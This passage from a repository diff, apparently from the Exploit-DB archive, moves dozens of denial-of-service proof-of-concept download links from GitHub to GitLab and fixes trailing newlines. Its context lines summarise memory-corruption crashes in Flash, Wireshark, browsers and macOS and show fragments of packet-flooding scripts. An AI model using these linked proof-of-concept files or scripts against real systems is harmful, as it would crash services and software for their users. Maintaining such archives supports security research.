b/exploits/multiple/dos/41609.txt index 56421cdc8..166470513 100644 --- a/exploits/multiple/dos/41609.txt +++ b/exploits/multiple/dos/41609.txt @@ -4,4 +4,4 @@ The attached file causes a use-after-free in attaching a MovieClip and applying Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41609.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41609.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41610.txt b/exploits/multiple/dos/41610.txt index bf19576fa..49f00f434 100644 --- a/exploits/multiple/dos/41610.txt +++ b/exploits/multiple/dos/41610.txt @@ -4,4 +4,4 @@ The attached file causes an overflow in heap thumbnailing. To reproduce, place b Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41610.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41610.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41611.txt b/exploits/multiple/dos/41611.txt index 015f8ac5e..1586d3a01 100644 --- a/exploits/multiple/dos/41611.txt +++ b/exploits/multiple/dos/41611.txt @@ -4,4 +4,4 @@ The attached file causes heap corruption when decompressing a planar block. To r Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41611.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41611.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41612.txt b/exploits/multiple/dos/41612.txt index 4152d6aab..182749a46 100644 --- a/exploits/multiple/dos/41612.txt +++ b/exploits/multiple/dos/41612.txt @@ -4,4 +4,4 @@ There is a heap overflow in AVC header slicing. To reproduce the issue, put the Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41612.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41612.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41668.txt b/exploits/multiple/dos/41668.txt index af3678e24..59fa6cd7b 100644 --- a/exploits/multiple/dos/41668.txt +++ b/exploits/multiple/dos/41668.txt @@ -13,7 +13,7 @@ https://www.onvio.nl/nieuws/cve-2017-6192 POC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41668.png +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41668.png The PoC contains an IHDR chunk size descriptor of 0xFFFFFFF4 diff --git a/exploits/multiple/dos/41669.txt b/exploits/multiple/dos/41669.txt index 96582b6c8..59e3e2b38 100644 --- a/exploits/multiple/dos/41669.txt +++ b/exploits/multiple/dos/41669.txt @@ -12,7 +12,7 @@ https://www.onvio.nl/nieuws/cve-2017-6193 POC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41669.png +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41669.png In the first bytes of the PoC, positions +0x10 through +0x17 are malformed to contain large values: diff --git a/exploits/multiple/dos/41905.txt b/exploits/multiple/dos/41905.txt index 98d49e22a..2c5993309 100644 --- a/exploits/multiple/dos/41905.txt +++ b/exploits/multiple/dos/41905.txt @@ -63,4 +63,4 @@ issue: "/** @todo validate this EMT claim... GVM knows. */") Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41905.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41905.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42017.txt b/exploits/multiple/dos/42017.txt index c65f8fb09..8974c0328 100644 --- a/exploits/multiple/dos/42017.txt +++ b/exploits/multiple/dos/42017.txt @@ -4,4 +4,4 @@ The attached swf triggers an out-of-bounds read in AVC deblocking. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42017.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42017.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42018.txt b/exploits/multiple/dos/42018.txt index 1bf0ff973..ec1522e5d 100644 --- a/exploits/multiple/dos/42018.txt +++ b/exploits/multiple/dos/42018.txt @@ -4,4 +4,4 @@ The attached fuzzed swf causes a crash due to heap corruption when processing th Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42018.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42018.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42019.txt b/exploits/multiple/dos/42019.txt index 765970dc6..5a7cfc73c 100644 --- a/exploits/multiple/dos/42019.txt +++ b/exploits/multiple/dos/42019.txt @@ -4,4 +4,4 @@ The attached swf causes an out-of-bounds read in getting the width of a TextFiel Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42019.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42019.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42049.txt b/exploits/multiple/dos/42049.txt index 64afc46a7..cce8f37d4 100644 --- a/exploits/multiple/dos/42049.txt +++ b/exploits/multiple/dos/42049.txt @@ -76,4 +76,4 @@ Binary file PhotoData/FacesMetadata/NVP_HIDDENFACES.hiddenfacemetadata matches Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42049.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42049.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42050.txt b/exploits/multiple/dos/42050.txt index 8ec1b5fb2..8dbe98cd0 100644 --- a/exploits/multiple/dos/42050.txt +++ b/exploits/multiple/dos/42050.txt @@ -12,4 +12,4 @@ tested on MacOS 10.12.3 (16D32) Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42050.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42050.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42051.txt b/exploits/multiple/dos/42051.txt index bf18731be..575d02050 100644 --- a/exploits/multiple/dos/42051.txt +++ b/exploits/multiple/dos/42051.txt @@ -41,4 +41,4 @@ tested on MacOS 10.12.3 (16D32) Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42051.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42051.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42052.txt b/exploits/multiple/dos/42052.txt index d77dfb506..f1ef09bd4 100644 --- a/exploits/multiple/dos/42052.txt +++ b/exploits/multiple/dos/42052.txt @@ -17,4 +17,4 @@ tested on MacOS 10.12.3 (16D32) Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42052.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42052.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42123.txt b/exploits/multiple/dos/42123.txt index e2b90ed4f..228d8f946 100644 --- a/exploits/multiple/dos/42123.txt +++ b/exploits/multiple/dos/42123.txt @@ -63,4 +63,4 @@ SUMMARY: AddressSanitizer: undefined-behavior wsutil/inet_ipv6.h:111:15 in Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42123.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42123.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42124.txt b/exploits/multiple/dos/42124.txt index 966058fb9..ed545b19d 100644 --- a/exploits/multiple/dos/42124.txt +++ b/exploits/multiple/dos/42124.txt @@ -83,4 +83,4 @@ SUMMARY: AddressSanitizer: undefined-behavior epan/wmem/wmem_map.c:419:57 in Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42124.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42124.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42245.txt b/exploits/multiple/dos/42245.txt index 4fdbc544a..28de0ae16 100644 --- a/exploits/multiple/dos/42245.txt +++ b/exploits/multiple/dos/42245.txt @@ -49,4 +49,4 @@ of their codebase which removed further issues. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42245.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42245.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42247.txt b/exploits/multiple/dos/42247.txt index 1ec4bc2fd..8888b7813 100644 --- a/exploits/multiple/dos/42247.txt +++ b/exploits/multiple/dos/42247.txt @@ -4,4 +4,4 @@ The attached file causes an out-of-bounds read in avc edge processing. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42247.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42247.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42248.txt b/exploits/multiple/dos/42248.txt index f0181647b..20ce0d056 100644 --- a/exploits/multiple/dos/42248.txt +++ b/exploits/multiple/dos/42248.txt @@ -6,4 +6,4 @@ http://127.0.0.1/LoadImage.swf=read1.png Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42248.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42248.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42249.txt b/exploits/multiple/dos/42249.txt index f79adc87f..5238e70f4 100644 --- a/exploits/multiple/dos/42249.txt +++ b/exploits/multiple/dos/42249.txt @@ -4,4 +4,4 @@ The attached file causes heap corruption in the ATF parser. To reproduce the iss Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42249.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42249.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42286.txt b/exploits/multiple/dos/42286.txt index 691a9e71a..5c0a08291 100644 --- a/exploits/multiple/dos/42286.txt +++ b/exploits/multiple/dos/42286.txt @@ -19,4 +19,4 @@ This PoC crashes on google-chrome-beta on Linux. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42286.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42286.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42666.txt b/exploits/multiple/dos/42666.txt index 52e66ff5e..2ee6b83a5 100644 --- a/exploits/multiple/dos/42666.txt +++ b/exploits/multiple/dos/42666.txt @@ -76,5 +76,4 @@ for (let i in {xx: 0}) { o[i]; i = new Uint32Array([0, 1, 0x777777, 0, 0]); } -} - +} \ No newline at end of file diff --git a/exploits/multiple/dos/42781.txt b/exploits/multiple/dos/42781.txt index e726be17f..8612ed08a 100644 --- a/exploits/multiple/dos/42781.txt +++ b/exploits/multiple/dos/42781.txt @@ -5,4 +5,4 @@ The attached MP4 file causes an out-of-bounds memory access when played in flash Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42781.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42781.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42782.txt b/exploits/multiple/dos/42782.txt index cb9be28a2..13652fa47 100644 --- a/exploits/multiple/dos/42782.txt +++ b/exploits/multiple/dos/42782.txt @@ -5,4 +5,4 @@ The attached fuzzed MP4 file causes an out-of-bounds memory access when played w Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42782.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42782.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42783.txt b/exploits/multiple/dos/42783.txt index c212d681a..071be31b9 100644 --- a/exploits/multiple/dos/42783.txt +++ b/exploits/multiple/dos/42783.txt @@ -5,4 +5,4 @@ The attached fuzzed file causes an out-of-bounds read in TextFormat.applyToRange Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42783.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42783.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42941.py b/exploits/multiple/dos/42941.py index 6e4c72486..f7d57a81f 100755 --- a/exploits/multiple/dos/42941.py +++ b/exploits/multiple/dos/42941.py @@ -202,4 +202,4 @@ if __name__ == '__main__': while True: udp_handler(sock_udp) - sock_udp.close() + sock_udp.close() \ No newline at end of file diff --git a/exploits/multiple/dos/42942.py b/exploits/multiple/dos/42942.py index ada225ab4..b1f97a2a7 100755 --- a/exploits/multiple/dos/42942.py +++ b/exploits/multiple/dos/42942.py @@ -142,4 +142,4 @@ if __name__ == '__main__': b"A" * 255 * 8, ]) - send_packet(pkg, host) + send_packet(pkg, host) \ No newline at end of file diff --git a/exploits/multiple/dos/42943.py b/exploits/multiple/dos/42943.py index 0cf697db5..38c0d4609 100755 --- a/exploits/multiple/dos/42943.py +++ b/exploits/multiple/dos/42943.py @@ -148,4 +148,4 @@ if __name__ == '__main__': ]) host, port = sys.argv[1:] - send_packet(pkg, host, int(port)) + send_packet(pkg, host, int(port)) \ No newline at end of file diff --git a/exploits/multiple/dos/42944.py b/exploits/multiple/dos/42944.py index 42840e184..bc4f6b006 100755 --- a/exploits/multiple/dos/42944.py +++ b/exploits/multiple/dos/42944.py @@ -105,4 +105,4 @@ if __name__ == '__main__': # Dump response with open('response.bin', 'wb') as f: - f.write(s.recvfrom(N_BYTES)[0]) + f.write(s.recvfrom(N_BYTES)[0]) \ No newline at end of file diff --git a/exploits/multiple/dos/42945.py b/exploits/multiple/dos/42945.py index 50a9095c6..f204d8b7f 100755 --- a/exploits/multiple/dos/42945.py +++ b/exploits/multiple/dos/42945.py @@ -58,4 +58,4 @@ if __name__ == '__main__': while True: s.sendto(packet, (ip, port)) #break - s.close() + s.close() \ No newline at end of file diff --git a/exploits/multiple/dos/42946.py b/exploits/multiple/dos/42946.py index d91e22b3a..c45a4c62a 100755 --- a/exploits/multiple/dos/42946.py +++ b/exploits/multiple/dos/42946.py @@ -96,4 +96,4 @@ if __name__ == '__main__': s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1) s.sendto(packet, (ip, port)) - s.close() + s.close() \ No newline at end of file diff --git a/exploits/multiple/dos/42969.rb b/exploits/multiple/dos/42969.rb index 0e8c15544..7acb3b776 100755 --- a/exploits/multiple/dos/42969.rb +++ b/exploits/multiple/dos/42969.rb @@ -59,5 +59,4 @@ while (true) try { print_status('Sending response') send_response(cli, @html) end -end - +end \ No newline at end of file diff --git a/exploits/multiple/dos/43233.txt b/exploits/multiple/dos/43233.txt index a73d72fe3..aec6c5b98 100644 --- a/exploits/multiple/dos/43233.txt +++ b/exploits/multiple/dos/43233.txt @@ -25,4 +25,4 @@ Upgrade to Wireshark 2.4.3, 2.2.11 or later. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43233.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43233.zip \ No newline at end of file diff --git a/exploits/multiple/dos/43320.txt b/exploits/multiple/dos/43320.txt index dad85eb5f..30e057310 100644 --- a/exploits/multiple/dos/43320.txt +++ b/exploits/multiple/dos/43320.txt @@ -33,4 +33,4 @@ See the README and kdbg.c for details. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43320.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43320.zip \ No newline at end of file diff --git a/exploits/multiple/dos/43325.txt b/exploits/multiple/dos/43325.txt index e67d97c3f..1039561be 100644 --- a/exploits/multiple/dos/43325.txt +++ b/exploits/multiple/dos/43325.txt @@ -140,4 +140,4 @@ is very late and there's a *lot* of code which you can hit before it. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43325.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43325.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44082.txt b/exploits/multiple/dos/44082.txt index 9af7030ed..0103485fb 100644 --- a/exploits/multiple/dos/44082.txt +++ b/exploits/multiple/dos/44082.txt @@ -217,4 +217,4 @@ We can see that any attempt to call a function with the wrong number of input pa The attached poc will crash under ASAN with the following stack-trace, and without ASAN during the free of the corrupted heap block. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44082.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44082.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44083.txt b/exploits/multiple/dos/44083.txt index c14f40855..21065b985 100644 --- a/exploits/multiple/dos/44083.txt +++ b/exploits/multiple/dos/44083.txt @@ -62,4 +62,4 @@ Originally reported without 90 day deadline as https://bugs.chromium.org/p/chrom Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44083.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44083.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44247.txt b/exploits/multiple/dos/44247.txt index 38807aa51..a646d203c 100644 --- a/exploits/multiple/dos/44247.txt +++ b/exploits/multiple/dos/44247.txt @@ -54,4 +54,4 @@ Telegram: https://t.me/kirill_wow Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44247.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44247.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44427.txt b/exploits/multiple/dos/44427.txt index 169649fd2..f77ff21ad 100644 --- a/exploits/multiple/dos/44427.txt +++ b/exploits/multiple/dos/44427.txt @@ -13,4 +13,4 @@ The attached html file causes a crash in Safari, the wasm file is attached as we Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44427.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44427.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44491.txt b/exploits/multiple/dos/44491.txt index 23a2147c9..465c1ff6b 100644 --- a/exploits/multiple/dos/44491.txt +++ b/exploits/multiple/dos/44491.txt @@ -97,4 +97,4 @@ rsvg-convert version 2.42.2 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44491.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44491.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44526.txt b/exploits/multiple/dos/44526.txt index e27b93cfa..51c25d11a 100644 --- a/exploits/multiple/dos/44526.txt +++ b/exploits/multiple/dos/44526.txt @@ -4,4 +4,4 @@ This PoC crashes a little bit unreliably, it is the most reliable in the standal Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44526.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44526.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44527.txt b/exploits/multiple/dos/44527.txt index d6bd4ced8..9c045c80a 100644 --- a/exploits/multiple/dos/44527.txt +++ b/exploits/multiple/dos/44527.txt @@ -4,4 +4,4 @@ This PoC crashes a little bit unreliably, it is the most reliable in the standal Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44527.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44527.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44528.txt b/exploits/multiple/dos/44528.txt index e97976885..e8a7a21e7 100644 --- a/exploits/multiple/dos/44528.txt +++ b/exploits/multiple/dos/44528.txt @@ -4,4 +4,4 @@ To reproduce, put the attached images on a webserver and vist: http://127.0.0.1? Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44528.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44528.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44529.txt b/exploits/multiple/dos/44529.txt index fbabeeac8..ee232e14b 100644 --- a/exploits/multiple/dos/44529.txt +++ b/exploits/multiple/dos/44529.txt @@ -4,4 +4,4 @@ This PoC crashes reliably in Firefox for Linux. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44529.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44529.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44849.txt b/exploits/multiple/dos/44849.txt index c30c15649..cd76fd1a8 100644 --- a/exploits/multiple/dos/44849.txt +++ b/exploits/multiple/dos/44849.txt @@ -75,4 +75,4 @@ Just run this PoC as root on MacOS for easy repro. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44849.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44849.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44862.txt b/exploits/multiple/dos/44862.txt index 4b70d7ddb..41bca717c 100644 --- a/exploits/multiple/dos/44862.txt +++ b/exploits/multiple/dos/44862.txt @@ -41,4 +41,4 @@ I have verified that this fix would prevent the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44862.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44862.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44863.txt b/exploits/multiple/dos/44863.txt index 18f224d3e..653d09a79 100644 --- a/exploits/multiple/dos/44863.txt +++ b/exploits/multiple/dos/44863.txt @@ -37,4 +37,4 @@ This issue affects any browser that supports VP9, and can be reached by loading Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44863.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44863.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45032.txt b/exploits/multiple/dos/45032.txt index 2100c9f2e..35345111e 100644 --- a/exploits/multiple/dos/45032.txt +++ b/exploits/multiple/dos/45032.txt @@ -15,4 +15,4 @@ document.write(location.href); Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45032.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45032.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45059.txt b/exploits/multiple/dos/45059.txt index 25dd29724..b418bbd8c 100644 --- a/exploits/multiple/dos/45059.txt +++ b/exploits/multiple/dos/45059.txt @@ -117,4 +117,4 @@ To test using the attached PoC, either run chrome with --disable-gpu to force so Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45059.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45059.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45098.txt b/exploits/multiple/dos/45098.txt index 5c4beec6b..1dfd10a4c 100644 --- a/exploits/multiple/dos/45098.txt +++ b/exploits/multiple/dos/45098.txt @@ -160,4 +160,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45098.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45098.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45121.txt b/exploits/multiple/dos/45121.txt index 15a22c8d2..4076e6ea3 100644 --- a/exploits/multiple/dos/45121.txt +++ b/exploits/multiple/dos/45121.txt @@ -103,4 +103,4 @@ This issue affects any browser that supports VP8, and can be reached by loading Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45121.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45121.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45122.txt b/exploits/multiple/dos/45122.txt index 4efa115d7..9190e09a8 100644 --- a/exploits/multiple/dos/45122.txt +++ b/exploits/multiple/dos/45122.txt @@ -73,4 +73,4 @@ To reproduce this issue: 3) run video_replay --input_file fallbackoob1 --config_file config4.txt Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45122.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45122.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45123.txt b/exploits/multiple/dos/45123.txt index 549508047..5956ac240 100644 --- a/exploits/multiple/dos/45123.txt +++ b/exploits/multiple/dos/45123.txt @@ -50,4 +50,4 @@ Adding stack trace: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45123.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45123.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45443.txt b/exploits/multiple/dos/45443.txt index e18ec629b..75b9b352f 100644 --- a/exploits/multiple/dos/45443.txt +++ b/exploits/multiple/dos/45443.txt @@ -151,4 +151,4 @@ To reproduce the issue: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45443.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45443.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45444.txt b/exploits/multiple/dos/45444.txt index 220abf1e2..787f9e9b0 100644 --- a/exploits/multiple/dos/45444.txt +++ b/exploits/multiple/dos/45444.txt @@ -173,4 +173,4 @@ To reproduce this issue: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45444.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45444.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45648.txt b/exploits/multiple/dos/45648.txt index ee6e91a69..da0623e30 100644 --- a/exploits/multiple/dos/45648.txt +++ b/exploits/multiple/dos/45648.txt @@ -33,4 +33,4 @@ Tested on MacOS 10.13.6 and iOS 11.3.1 (that's the highest version I have on a d Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45648.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45648.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45650.txt b/exploits/multiple/dos/45650.txt index 413d5e4d7..31167a9c4 100644 --- a/exploits/multiple/dos/45650.txt +++ b/exploits/multiple/dos/45650.txt @@ -13,4 +13,4 @@ dq8: exploit for this issue, and a new exploit for the original pangu variant of Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45650.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45650.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45950.txt b/exploits/multiple/dos/45950.txt index 9a0fa8b1f..7efbfcc22 100644 --- a/exploits/multiple/dos/45950.txt +++ b/exploits/multiple/dos/45950.txt @@ -177,4 +177,4 @@ The bug was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1532 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45950.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45950.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45951.txt b/exploits/multiple/dos/45951.txt index cdc79948c..e59b39291 100644 --- a/exploits/multiple/dos/45951.txt +++ b/exploits/multiple/dos/45951.txt @@ -54,4 +54,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=15 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45951.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45951.zip \ No newline at end of file diff --git a/exploits/multiple/dos/4601.txt b/exploits/multiple/dos/4601.txt index 3e8ef09ad..11378bf9a 100644 --- a/exploits/multiple/dos/4601.txt +++ b/exploits/multiple/dos/4601.txt @@ -1,6 +1,6 @@ Ubuntu 6.06 DHCPd bug Remote Denial of Service Exploit Author: RoMaNSoFt <roman@rs-labs.com> -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz) +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz) # milw0rm.com [2007-11-02] \ No newline at end of file diff --git a/exploits/multiple/dos/46096.txt b/exploits/multiple/dos/46096.txt index 